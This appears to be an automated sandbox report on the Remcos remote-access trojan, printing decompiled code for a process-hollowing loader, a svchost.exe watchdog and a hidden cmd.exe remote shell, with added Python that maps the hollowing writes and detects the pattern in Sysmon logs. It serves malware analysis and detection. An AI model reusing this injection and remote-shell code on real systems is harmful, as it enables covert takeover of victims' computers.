                    				_v16 = __edx;
                    				_v24 = __ecx;
                    				if( *((intOrPtr*)(__edx)) == 0x5a4d) {
                    					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
                    					if( *_t95 == 0x4550) {
                    						_push(_t106);
                    						E00431F00(_t106,  &_v92, 0, 0x44);
                    						_t116 = _a4;
                    						asm("stosd");
                    						asm("stosd");
                    						asm("stosd");
                    						asm("stosd");
                    						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
                    							L21:
                    							_t58 = 0;
                    							L22:
                    							L23:
                    							return _t58;
                    						}
                    						CloseHandle(_v92.hStdInput);
                    						CloseHandle(_v92.hStdOutput);
                    						CloseHandle(_v92.hStdError);
                    						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
                    						_v20 = _t110;
                    						_t110->ContextFlags = 0x10007;
                    						if(GetThreadContext(_t116->hThread, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
                    							L20:
                    							TerminateProcess(_t116->hProcess, 0);
                    							CloseHandle(_t116->hProcess);
                    							CloseHandle(_t116->hThread);
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							goto L21;
                    						} else {
                    							_t72 = _v8;
                    							if(_t72 ==  *(_t95 + 0x34)) {
                    								NtUnmapViewOfSection(_t116->hProcess, _t72);
                    							}
                    							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
                    							_v24 = _t73;
                    							if(_t73 == 0) {
                    								goto L20;
                    							} else {
                    								_t22 =  &_v16; // 0x41433b
                    								_t113 =  *_t22;
                    								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
                    									goto L20;
                    								}
                    								_v12 = _v12 & 0x00000000;
                    								if(0 >=  *(_t95 + 6)) {
                    									L14:
                    									_t98 = _t95 + 0x34;
                    									_t114 = _v20;
                    									if(_v8 ==  *_t98) {
                    										L17:
                    										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
                    										if(SetThreadContext(_t116->hThread, _t114) == 0 || ResumeThread(_t116->hThread) == 0xffffffff) {
                    											goto L20;
                    										} else {
                    											_t58 = 1;
                    											goto L22;
                    										}
                    									}
                    									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
                    									if(_t83 != 0) {
                    										goto L17;
                    									}
                    									TerminateProcess(_t116->hProcess, _t83);
                    									goto L21;
                    								}
                    								_t104 = 0;
                    								_v16 = 0;
                    								do {
                    									WriteProcessMemory( *_t116,  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x10c)) + _t113,  *( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x108), 0);
                    									_t37 =  &_v16; // 0x41433b
                    									_t102 = _v12 + 1;
                    									_t104 =  *_t37 + 0x28;
                    									_v12 = _t102;
                    									_v16 = _t104;
                    								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
                    								goto L14;
                    							}
                    						}
                    					}
                    					_t58 = 0;
                    					goto L23;
                    				}
                    				return 0;
                    			}
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ;CA
                    • API String ID: 0-233881251
                    • Opcode ID: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
                    • Instruction ID: bd197fad053dbfc90d5835daa1a59b9970fe7a36a364e2f4af16486f2ac585b0
                    • Opcode Fuzzy Hash: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
                    • Instruction Fuzzy Hash: 09518D70600604BFEB108FA5CC45FAABBB9FF84742F144065FA54E62A1C775D990DB68
                    Uniqueness

                    Uniqueness Score: -1.00%
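The loop above is a conventional RunPE loader: VirtualAllocEx is asked for exactly the payload's preferred ImageBase (NT+0x34) with SizeOfImage (NT+0x50), the headers are copied with SizeOfHeaders (NT+0x54), every section is copied to base + VirtualAddress from PointerToRawData for SizeOfRawData bytes, the suspended process's PEB.ImageBaseAddress (Ebx+8 of the initial thread) is patched, and Eax is pointed at base + AddressOfEntryPoint (NT+0x28) before ResumeThread. The +0x104, +0x108 and +0x10c reads are sizeof(IMAGE_NT_HEADERS32) = 0xF8 plus the section header offsets 0xC, 0x10 and 0x14, walked in 0x28-byte strides for NumberOfSections (NT+0x06). The Python below is an added example, not code from the sample or from the report: it reads those same fields at the same raw offsets from a constructed minimal PE32 and returns the WriteProcessMemory plan the loader would issue, so an analyst can sanity-check an extracted payload before stepping the injection. The two bounds checks are additions; the sample performs neither, and it aborts rather than relocating if the allocation does not land at ImageBase.

```python
import struct

# Header offsets the RunPE loop dereferences (PE32 layout, relative to "PE\0\0").
E_LFANEW = 0x3C            # DOS header -> NT headers
NT_NUM_SECTIONS = 0x06     # IMAGE_FILE_HEADER.NumberOfSections   (*(nt+6) & 0xffff)
NT_ENTRY_POINT = 0x28      # OptionalHeader.AddressOfEntryPoint   (nt+0x28)
NT_IMAGE_BASE = 0x34       # OptionalHeader.ImageBase             (nt+0x34)
NT_SIZE_OF_IMAGE = 0x50    # OptionalHeader.SizeOfImage           (nt+0x50)
NT_SIZE_OF_HEADERS = 0x54  # OptionalHeader.SizeOfHeaders         (nt+0x54)
NT_FIRST_SECTION = 0xF8    # sizeof(IMAGE_NT_HEADERS32); +0xC/+0x10/+0x14 are the 0x104/0x108/0x10c reads
SECTION_HEADER_SIZE = 0x28


def build_sample_pe32() -> bytes:
    """Constructed, non-executable PE32 image with two sections (test input only, not a real binary)."""
    image_base, entry, size_of_image, size_of_headers = 0x400000, 0x1000, 0x3000, 0x200
    # (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData)
    sections = [(b".text", 0x100, 0x1000, 0x200, 0x200),
                (b".data", 0x050, 0x2000, 0x200, 0x400)]
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, E_LFANEW, 0x40)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)                                            # optional header starts at NT+0x18
    struct.pack_into("<H", opt, 0x00, 0x10B)                         # PE32 magic
    struct.pack_into("<I", opt, NT_ENTRY_POINT - 0x18, entry)
    struct.pack_into("<I", opt, NT_IMAGE_BASE - 0x18, image_base)
    struct.pack_into("<II", opt, 0x20, 0x1000, 0x200)                # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, NT_SIZE_OF_IMAGE - 0x18, size_of_image, size_of_headers)
    struct.pack_into("<H", opt, 0x44, 2)                             # Subsystem: GUI
    struct.pack_into("<I", opt, 0x5C, 16)                            # NumberOfRvaAndSizes
    sec_hdrs = b"".join(
        struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, va, rawsz, rawptr, 0, 0, 0, 0, 0x60000020)
        for name, vsize, va, rawsz, rawptr in sections)
    image = bytearray(dos + b"PE\0\0" + file_hdr + opt + sec_hdrs)
    image += b"\0" * (size_of_headers - len(image))                  # pad headers to SizeOfHeaders
    image += b"\x90" * 0x200                                         # .text raw data at 0x200
    image += b"\x41" * 0x200                                         # .data raw data at 0x400
    return bytes(image)


def parse_hollow_layout(pe: bytes) -> dict:
    """Read the header fields the loader reads, at the same raw offsets it uses."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    nt = struct.unpack_from("<I", pe, E_LFANEW)[0]                   # *(buf + 0x3c)
    if pe[nt:nt + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    if struct.unpack_from("<H", pe, nt + 0x18)[0] != 0x10B:
        raise ValueError("offsets above are PE32-only (magic 0x10b)")
    num_sections = struct.unpack_from("<H", pe, nt + NT_NUM_SECTIONS)[0]
    entry_point = struct.unpack_from("<I", pe, nt + NT_ENTRY_POINT)[0]
    image_base = struct.unpack_from("<I", pe, nt + NT_IMAGE_BASE)[0]
    size_of_image = struct.unpack_from("<I", pe, nt + NT_SIZE_OF_IMAGE)[0]
    size_of_headers = struct.unpack_from("<I", pe, nt + NT_SIZE_OF_HEADERS)[0]
    sections = []
    for i in range(num_sections):
        sh = nt + NT_FIRST_SECTION + SECTION_HEADER_SIZE * i
        va, raw_size, raw_ptr = struct.unpack_from("<III", pe, sh + 0x0C)
        sections.append((va, raw_ptr, raw_size))
    return {"image_base": image_base, "entry_point": entry_point, "size_of_image": size_of_image,
            "size_of_headers": size_of_headers, "num_sections": num_sections, "sections": sections}


def hollow_write_plan(pe: bytes) -> dict:
    """The (destination, source offset, size) WriteProcessMemory calls, the PEB patch and the new Eax."""
    lay = parse_hollow_layout(pe)
    base = lay["image_base"]                 # VirtualAllocEx is requested at ImageBase; anything else aborts
    writes = [(base, 0, lay["size_of_headers"])]                     # headers first, then each section
    for va, raw_ptr, raw_size in lay["sections"]:
        if raw_ptr + raw_size > len(pe):                             # added check, absent in the sample
            raise ValueError("section raw data runs past the end of the payload")
        if va + raw_size > lay["size_of_image"]:                     # added check, absent in the sample
            raise ValueError("section would be written outside the allocated image")
        writes.append((base + va, raw_ptr, raw_size))
    return {"alloc": (base, lay["size_of_image"]), "writes": writes,
            "peb_image_base": base, "thread_eax": base + lay["entry_point"]}


if __name__ == "__main__":
    plan = hollow_write_plan(build_sample_pe32())
    for dst, src, size in plan["writes"]:
        print(f"WriteProcessMemory(h, {dst:#010x}, buf+{src:#06x}, {size:#x})")
    print(f"PEB.ImageBaseAddress = {plan['peb_image_base']:#x}, Eax = {plan['thread_eax']:#x}")
```

Run it against a payload dumped from the injector's buffer (the 00400000 region of process 7 in this report is the result, not the input) to confirm that every destination lies inside the allocation and that Eax points into a mapped section.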

                    C-Code - Quality: 82%
                    			E0040FAC7(void* __eflags) {
                    				char _v28;
                    				char _v36;
                    				void* _v40;
                    				char _v56;
                    				void* _v64;
                    				char _v76;
                    				char _v84;
                    				void* _v88;
                    				char _v100;
                    				char _v104;
                    				void* _v108;
                    				char _v124;
                    				char _v128;
                    				long _v132;
                    				char _v148;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				long _t26;
                    				void* _t29;
                    				void* _t35;
                    				void* _t46;
                    				void* _t61;
                    				void* _t78;
                    				void* _t107;
                    				long _t112;
                    				long _t141;
                    				void* _t142;
                    				CHAR* _t143;
                    				void* _t145;
                    				signed int _t147;
                    				void* _t149;
                    				void* _t155;
                    
                    				_t149 = (_t147 & 0xfffffff8) - 0x7c;
                    				_push(_t142);
                    				_t26 = GetCurrentProcessId();
                    				if(E00410BB0(0x46c518, E00401F95(0x46c518), "WD", _t26) != 0) {
                    					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
                    					__eflags = _t29;
                    					if(_t29 == 0) {
                    						E004020D5(0x46c518,  &_v100);
                    						E004179DC(E00401EEB(0x46c500),  &_v100);
                    						E00401F6D(0x46c518,  &_v124);
                    						__eflags = E00417614( &_v124);
                    						if(__eflags != 0) {
                    							_t35 = E0040427F(0x46c518,  &_v76, L"\\SysWOW64");
                    							E00401EFA( &_v132, _t37, _t142, E00403030( &_v36, E0040427F(0x46c518,  &_v56, E0043987F(0x46c518,  &_v76, __eflags, L"WinDir")), _t35));
                    							E00401EF0();
                    							E00401EF0();
                    						} else {
                    							_t61 = E0040427F(0x46c518,  &_v28, L"\\system32");
                    							E00401EFA( &_v132, _t63, _t142, E00403030( &_v84, E0040427F(0x46c518,  &_v56, E0043987F(0x46c518,  &_v28, __eflags, L"WinDir")), _t61));
                    							E00401EF0();
                    							E00401EF0();
                    						}
                    						E00401EF0();
                    						E0040766C(0x46c518,  &_v124, 0, L"\\svchost.exe");
                    						_t143 = E00401F95( &_v104);
                    						_t46 = E0041412B(E00401EEB( &_v128), _t143, 0x46bd50);
                    						_t150 = _t149 - 0x18;
                    						_t107 = _t149 - 0x18;
                    						__eflags = _t46;
                    						if(_t46 != 0) {
                    							E00402084(0x46c518, _t107, "Watchdog module activated");
                    							E00402084(0x46c518, _t150 - 0x18, "[Info]");
                    							E00416C80(0x46c518, 0);
                    							Sleep(0x7d0);
                    							_t112 =  *0x46bd58; // 0x0
                    							goto L13;
                    						}
                    						E00402084(0x46c518, _t107, "Watchdog launch failed!");
                    						E00402084(0x46c518, _t150 - 0x18, "[ERROR]");
                    						E00416C80(0x46c518, 0);
                    						CloseHandle( *0x46bd60);
                    						E00401EF0();
                    						E00401FC7();
                    						_push(3);
                    						_pop(1);
                    					} else {
                    						CloseHandle(_t29);
                    						_t155 = _t149 - 0x18;
                    						E00402084(0x46c518, _t155, "Remcos restarted by watchdog!");
                    						_t156 = _t155 - 0x18;
                    						E00402084(0x46c518, _t155 - 0x18, "[Info]");
                    						E00416C80(0x46c518, 0);
                    						E00402084(0x46c518, _t156 + 0x18, "Watchdog module activated");
                    						E00402084(0x46c518, _t156 + 0x18 - 0x18, "[Info]");
                    						E00416C80(0x46c518, 0);
                    						CreateThread(0, 0, E004100F9, 0, 0, 0);
                    						_t143 = "WDH";
                    						_t78 = E00410885(E00401F95(0x46c518), _t143,  &_v148);
                    						__eflags = _t78;
                    						if(_t78 == 0) {
                    							goto L1;
                    						} else {
                    							 *0x46bd50 = OpenProcess(0x1fffff, 0, _v132);
                    							E00410CE2(E00401F95(0x46c518), __eflags, _t143);
                    							_t112 = _v132;
                    							L13:
                    							L14();
                    							asm("int3");
                    							_push(_t143);
                    							_push(0);
                    							_t141 = _t112;
                    							L15:
                    							_t145 = OpenProcess(0x100000, 0, _t141);
                    							WaitForSingleObject(_t145, 0xffffffff);
                    							CloseHandle(_t145);
                    							__eflags =  *0x46bd4e;
                    							if(__eflags != 0) {
                    								E0040FAC7(__eflags, 0);
                    							}
                    							goto L15;
                    						}
                    						L17:
                    					}
                    				} else {
                    					L1:
                    				}
                    				return 1;
                    				goto L17;
                    			}
                    APIs
                    • GetCurrentProcessId.KERNEL32 ref: 0040FAD3
                      • Part of subcall function 00410BB0: RegCreateKeyA.ADVAPI32(80000001,00000000,0045F6BC), ref: 00410BBE
                      • Part of subcall function 00410BB0: RegSetValueExA.ADVAPI32(0045F6BC,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040A669,0045FEF8,00000001,000000AF,0045F6BC), ref: 00410BD9
                      • Part of subcall function 00410BB0: RegCloseKey.ADVAPI32(0045F6BC,?,?,?,0040A669,0045FEF8,00000001,000000AF,0045F6BC), ref: 00410BE4
                    • OpenMutexA.KERNEL32 ref: 0040FB0D
                    • CloseHandle.KERNEL32(00000000), ref: 0040FB1C
                    • CreateThread.KERNEL32(00000000,00000000,004100F9,00000000,00000000,00000000), ref: 0040FB72
                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD3A
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                    • String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
                    • API String ID: 3018269243-3797382479
                    • Opcode ID: 9e7962662ee2d71a2bfb1219488584e3dbb1d2bfd0aa3992875f53d151df0142
                    • Instruction ID: b085b79558e0c22ee18e78a7f4af536a5d5efbf70cd450b3fa531ddec726aa5e
                    • Opcode Fuzzy Hash: 9e7962662ee2d71a2bfb1219488584e3dbb1d2bfd0aa3992875f53d151df0142
                    • Instruction Fuzzy Hash: 545120316043015BC218BB72CC1B8AF37699E91749F50043FF946721E2EE789909C6AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E004055EA(char _a4) {
                    				long _v8;
                    				long _v12;
                    				long _v16;
                    				char _v40;
                    				char _v64;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				long _t52;
                    				void* _t56;
                    				void* _t66;
                    				void* _t70;
                    				void* _t79;
                    				CHAR* _t80;
                    				int _t98;
                    				intOrPtr* _t107;
                    				intOrPtr _t138;
                    				signed int _t146;
                    				signed int _t147;
                    				long _t151;
                    				void* _t155;
                    				intOrPtr* _t156;
                    				void* _t163;
                    				void* _t168;
                    				void* _t175;
                    
                    				_t156 = _t155 - 0x3c;
                    				_push(_t146);
                    				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
                    				_t147 = _t146 | 0xffffffff;
                    				_t98 = 0;
                    				if( *0x46dce8 >  *((intOrPtr*)(_t138 + 4))) {
                    					E0042F114(0x46dce8);
                    					_t160 =  *0x46dce8 - _t147;
                    					if( *0x46dce8 == _t147) {
                    						E0040484E(0, 0x46dc60, 0);
                    						E0042F49E(_t160, E004527B3);
                    						 *_t156 = 0x46dce8;
                    						E0042F0D5(_t147);
                    					}
                    				}
                    				if( *0x46dcc8 >  *((intOrPtr*)(_t138 + 4))) {
                    					E0042F114(0x46dcc8);
                    					_t162 =  *0x46dcc8 - _t147;
                    					if( *0x46dcc8 == _t147) {
                    						E004020D5(_t98, 0x46dcf0);
                    						E0042F49E(_t162, E004527A9);
                    						E0042F0D5(_t147, 0x46dcc8);
                    					}
                    				}
                    				_t100 =  &_v40;
                    				E004020D5(_t98,  &_v40);
                    				_t139 = 0x46c2d0;
                    				_v8 = _t98;
                    				_t163 =  *0x46bae2 - _t98; // 0x0
                    				if(_t163 != 0) {
                    					L12:
                    					_v12 = _t98;
                    					PeekNamedPipe( *0x46dcd0, _t98, _t98, _t98,  &_v12, _t98);
                    					if(_v12 <= _t98) {
                    						_t156 = _t156 - 0x18;
                    						E00402084(_t98, _t156, 0x45f6bc);
                    						_push(0x62);
                    						_t147 = E00404AA4(_t98, 0x46dc60, _t136, __eflags);
                    						goto L21;
                    					}
                    					_push(_v12);
                    					_t56 = E004394F6(_t100);
                    					_t140 = _t56;
                    					ReadFile( *0x46dcd0, _t56, _v12,  &_v16, _t98);
                    					if(_v16 <= _t98) {
                    						L19:
                    						L004394F1(_t140);
                    						_t139 = 0x46c2d0;
                    						goto L21;
                    					}
                    					if(_v8 <= _t98) {
                    						L17:
                    						E00402084(_t98,  &_v64, _t140);
                    						_t156 = _t156 - 0x18;
                    						_t107 = _t156;
                    						_push(_v16);
                    						_push(_t98);
                    						L18:
                    						E00405A14(_t98, _t107, _t136, _t172);
                    						_t147 = E00404AA4(_t98, 0x46dc60, _t136, _t172, 0x62,  &_v64);
                    						E00401FC7();
                    						goto L19;
                    					}
                    					_t66 = E00439510(_t140, E00401F95( &_v40), _v8);
                    					_t156 = _t156 + 0xc;
                    					_t172 = _t66;
                    					if(_t66 != 0) {
                    						goto L17;
                    					}
                    					E00402084(_t98,  &_v64, _t140);
                    					_t156 = _t156 - 0x18;
                    					_t107 = _t156;
                    					_push(_v16 - _v8);
                    					_push(_v8);
                    					goto L18;
                    				} else {
                    					_t136 = "cmd.exe";
                    					_t70 = E00405A6F("cmd.exe");
                    					_t164 = _t70;
                    					if(_t70 == 0) {
                    						L26:
                    						E00404E0B(0x46dc60);
                    						CloseHandle( *0x46dcd0);
                    						CloseHandle( *0x46dcec);
                    						 *0x46bae2 = _t98;
                    						_t98 = 1;
                    						L27:
                    						E00401FC7();
                    						E00401FC7();
                    						return _t98;
                    					}
                    					E00405A0B(_t98, 0x46dcf0, E0043988A(_t98, _t164, "SystemDrive"));
                    					E00405A02(_t98, 0x46dcf0, 0x46c2d0, "\\");
                    					0x46dc08->nLength = 0xc;
                    					 *0x46dc10 = 1;
                    					 *0x46dc0c = _t98;
                    					if(CreatePipe(0x46dce4, 0x46dccc, 0x46dc08, _t98) == 0 || CreatePipe(0x46dcd0, 0x46dcec, 0x46dc08, _t98) == 0) {
                    						goto L27;
                    					} else {
                    						_t151 = 0x44;
                    						E00431F00(0x46dc18, 0x46dc18, _t98, CreatePipe);
                    						0x46dc18->cb = _t151;
                    						 *0x46dc44 = 0x101;
                    						 *0x46dc48 = 0;
                    						 *0x46dc50 =  *0x46dce4;
                    						_t79 =  *0x46dcec;
                    						 *0x46dc54 = _t79;
                    						 *0x46dc58 = _t79;
                    						_t80 = E00401F95(0x46dcf0);
                    						 *0x46bae2 = CreateProcessA(_t98, E00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4) != 0;
                    						E00405A0B(_t98, 0x46c2d0, 0x45f6bc);
                    						 *0x46bae3 = 1;
                    						E0040498B(0x46dc60);
                    						asm("movsd");
                    						asm("movsd");
                    						asm("movsd");
                    						asm("movsd");
                    						E00404A08("cmd.exe");
                    						_t156 = _t156 + 0xc - 0xfffffffffffffff8;
                    						E004020EC(_t98, _t156, "cmd.exe", CreateProcessA(_t98, E00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4),  &_a4);
                    						_push(0x93);
                    						_t100 = 0x46dc60;
                    						_t147 = E00404AA4(_t98, 0x46dc60, "cmd.exe", CreateProcessA(_t98, E00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4));
                    						Sleep(0x12c);
                    						_t168 =  *0x46bae2 - _t98; // 0x0
                    						if(_t168 == 0) {
                    							goto L26;
                    						}
                    						_t139 = 0x46c2d0;
                    						do {
                    							goto L12;
                    							L21:
                    							_t38 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
                    							_t100 = _t139;
                    							 *0x46bae3 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
                    							if(E00402489() == 0) {
                    								_v8 = _t98;
                    							} else {
                    								E00405A02(_t98, _t139, _t139, "\n");
                    								E00401FAD( &_v40, _t139);
                    								_t52 = E00402489();
                    								WriteFile( *0x46dccc, E00401F95(_t139), _t52,  &_v8, _t98);
                    								_t100 = _t139;
                    								E00405A0B(_t98, _t139, 0x45f6bc);
                    							}
                    							Sleep(0x64);
                    							_t175 =  *0x46bae3 - _t98; // 0x0
                    						} while (_t175 != 0);
                    						TerminateProcess(0x46dcd4->hProcess, _t98);
                    						CloseHandle( *0x46dcd8);
                    						CloseHandle( *0x46dcd4);
                    						goto L26;
                    					}
                    				}
                    			}
                    APIs
                    • __Init_thread_footer.LIBCMT ref: 0040563C
                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                    • __Init_thread_footer.LIBCMT ref: 00405679
                    • CreatePipe.KERNEL32(0046DCE4,0046DCCC,0046DC08,00000000,0045F6D4,00000000), ref: 00405704
                    • CreatePipe.KERNEL32(0046DCD0,0046DCEC,0046DC08,00000000), ref: 0040571A
                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0046DC18,0046DCD4), ref: 0040578D
                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 004057F4
                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040581C
                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405845
                      • Part of subcall function 0042F49E: __onexit.LIBCMT ref: 0042F4A4
                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,0046C2D0,0045F6D8,00000062,0045F6BC), ref: 00405932
                    • Sleep.KERNEL32(00000064,00000062,0045F6BC), ref: 0040594B
                    • TerminateProcess.KERNEL32(00000000), ref: 00405964
                    • CloseHandle.KERNEL32 ref: 00405970
                    • CloseHandle.KERNEL32 ref: 0040597C
                    • CloseHandle.KERNEL32 ref: 00405992
                    • CloseHandle.KERNEL32 ref: 0040599E
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                    • String ID: SystemDrive$cmd.exe
                    • API String ID: 2994406822-3633465311
                    • Opcode ID: e84c41bf3866c36445e5e5f8050936f23962f768152f0ad89c41c60dad4bb5f6
                    • Instruction ID: 55ed603c712564892f9c2332be2a793e9955a409e8b955cd36c8b06ecb557e64
                    • Opcode Fuzzy Hash: e84c41bf3866c36445e5e5f8050936f23962f768152f0ad89c41c60dad4bb5f6
                    • Instruction Fuzzy Hash: E591D671F00208ABCB05BB659D4696F3A69EB44304B10407FF905B72E2EBF84D05DB5E
                    Uniqueness

                    Uniqueness Score: -1.00%
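The two routines above leave a distinctive process-tree footprint. The watchdog (E0040FAC7) stores the current PID under the "WD" registry value, decides its role by the "Mutex_RemWatchdog" mutex, launches %WinDir%\system32\svchost.exe or %WinDir%\SysWOW64\svchost.exe through the hollowing routine E0041412B, and then opens its peer with OpenProcess(0x1fffff) or OpenProcess(0x100000) and blocks in WaitForSingleObject so it can restart it. The remote shell (E004055EA) starts cmd.exe with STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW (0x101), a hidden window and two anonymous pipes, polling stdout with PeekNamedPipe. The Python below is an added example, not part of the report, that runs three checks over a constructed list of Sysmon-style ProcessCreate (event 1) and ProcessAccess (event 10) records: an svchost.exe whose parent is not services.exe, a pair of processes that opened each other with PROCESS_ALL_ACCESS or SYNCHRONIZE, and cmd.exe as a child of that svchost.exe. The record field names, PIDs and the sample.exe path are assumptions made for the example.

```python
from typing import Dict, List, Tuple

PROCESS_ALL_ACCESS = 0x1FFFFF   # OpenProcess mask the watchdog uses on its peer (0x1fffff above)
SYNCHRONIZE = 0x100000          # mask used before WaitForSingleObject on the peer (0x100000 above)

Event = Dict[str, object]

# Constructed Sysmon-style records (not taken from the sandbox run).  id 1 = ProcessCreate,
# id 10 = ProcessAccess; field names are simplified for the example.
SAMPLE_EVENTS: List[Event] = [
    {"id": 1, "pid": 4712, "image": r"C:\Users\user\Desktop\sample.exe",
     "ppid": 3000, "parent_image": r"C:\Windows\explorer.exe"},
    {"id": 1, "pid": 5120, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "ppid": 4712, "parent_image": r"C:\Users\user\Desktop\sample.exe"},
    {"id": 10, "source_pid": 5120, "target_pid": 4712, "granted_access": PROCESS_ALL_ACCESS},
    {"id": 10, "source_pid": 4712, "target_pid": 5120, "granted_access": SYNCHRONIZE},
    {"id": 1, "pid": 6000, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "ppid": 5120, "parent_image": r"C:\Windows\SysWOW64\svchost.exe"},
    # benign control: a service host started by the SCM, touched only by its parent
    {"id": 1, "pid": 7000, "image": r"C:\Windows\System32\svchost.exe",
     "ppid": 800, "parent_image": r"C:\Windows\System32\services.exe"},
    {"id": 10, "source_pid": 800, "target_pid": 7000, "granted_access": 0x1000},
]


def _name(path: object) -> str:
    """Case-insensitive basename of a Windows path."""
    return str(path).rsplit("\\", 1)[-1].lower()


def unparented_svchost(events: List[Event]) -> List[int]:
    """svchost.exe not started by services.exe: the host the watchdog hollows and resumes."""
    return [e["pid"] for e in events
            if e["id"] == 1 and _name(e["image"]) == "svchost.exe"
            and _name(e["parent_image"]) != "services.exe"]


def mutual_watch_pairs(events: List[Event]) -> List[Tuple[int, int]]:
    """Process pairs that opened each other with ALL_ACCESS or SYNCHRONIZE (the restart-each-other loop)."""
    opens = {(e["source_pid"], e["target_pid"]) for e in events
             if e["id"] == 10 and e["granted_access"] in (PROCESS_ALL_ACCESS, SYNCHRONIZE)}
    return sorted({(min(a, b), max(a, b)) for a, b in opens if (b, a) in opens})


def shells_under_svchost(events: List[Event]) -> List[int]:
    """cmd.exe spawned by svchost.exe, as E004055EA does from inside the hollowed host."""
    return [e["pid"] for e in events
            if e["id"] == 1 and _name(e["image"]) == "cmd.exe"
            and _name(e["parent_image"]) == "svchost.exe"]


def triage(events: List[Event]) -> Dict[str, object]:
    """Combine the checks: a hollowed svchost that is half of a watch pair and that spawns cmd.exe."""
    hosts = unparented_svchost(events)
    pairs = mutual_watch_pairs(events)
    shells = shells_under_svchost(events)
    watched_hosts = [h for h in hosts if any(h in p for p in pairs)]
    chained = [e["pid"] for e in events
               if e["id"] == 1 and e["pid"] in shells and e["ppid"] in watched_hosts]
    return {"hollowed_svchost": hosts, "watch_pairs": pairs, "shells": shells,
            "remcos_pattern": bool(chained)}


if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

Each check alone has benign hits (debuggers open processes with full access, some installers spawn svchost-named droppers, admins run cmd.exe from service contexts), which is why `triage` only raises the combined verdict when the hollowed host is also half of a mutual watch pair and the parent of the shell.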

                    C-Code - Quality: 95%
                    			E0040A012(void* __ebx, void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				struct _WIN32_FIND_DATAA _v468;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t45;
                    				signed int _t58;
                    				signed int _t59;
                    				signed int _t73;
                    				signed int _t75;
                    				char* _t108;
                    				signed int _t109;
                    				char* _t129;
                    				void* _t130;
                    				void* _t134;
                    				void* _t135;
                    				void* _t136;
                    				void* _t137;
                    
                    				_t142 = __eflags;
                    				_t134 = __edi;
                    				_t89 = __ebx;
                    				E004020D5(__ebx,  &_v100);
                    				E004020D5(__ebx,  &_v76);
